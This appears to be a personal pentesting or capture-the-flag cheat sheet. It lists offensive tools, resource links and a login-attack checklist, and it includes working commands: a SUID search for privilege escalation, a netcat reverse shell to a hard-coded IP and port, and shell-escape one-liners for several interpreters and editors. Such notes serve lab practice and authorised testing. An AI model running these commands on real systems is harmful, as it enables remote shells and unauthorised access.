- nmap
- rustscan
- masscan
- nikto
- gobuster
- zap
- burp
- haiti - guess hash algorithm
- codetective - find encoding algorithm
- john
- ssh2john
- hydra
- wpscan
- linuxprivchecker
- GHunt
find / -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/nullnmap --script=smb-enum-shares ...rm /tmp/f ; mkfifo /tmp/f ; cat /tmp/f | /bin/sh -i 2>&1 | nc 10.8.6.159 1337 >/tmp/fgrep "^j" rockyou.txt | grep "^[a-Z0-9\-\_]*$" | perl -e 'print sort { length($a) <=> length($b) } <>' > j-names.txt
- python -
python -c 'import pty; pty.spawn("/bin/sh")' - sh -
echo os.system('/bin/bash') - sh -
/bin/sh -i - perl -
perl —e 'exec "/bin/sh";' - perl -
perl: exec "/bin/sh"; - ruby -
ruby: exec "/bin/sh" - lua -
lua: os.execute('/bin/sh') - IRB -
exec "/bin/sh" - vi -
:!bash - vi -
:set shell=/bin/bash:shell - nmap -
!sh
- https://gtfobins.github.io/ - binary exploits
- https://blackarch.org/tools.html - blackarch tools and descriptions
- https://netsec.ws/?p=337 - various ways to spawn a shell
- http://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
- https://book.hacktricks.xyz/linux-unix/privilege-escalation
- https://github.com/swisskyrepo/PayloadsAllTheThings
- https://github.com/sundowndev/hacker-roadmap
- https://github.com/The-Art-of-Hacking/h4cker
- https://github.com/blaCCkHatHacEEkr/PENTESTING-BIBLE
- https://github.com/enaqx/awesome-pentest
- Find and try default login credentials
- Look around locally for any possible usernames
- OSINT, continue to build list of possible logins
- All else fails, brute-force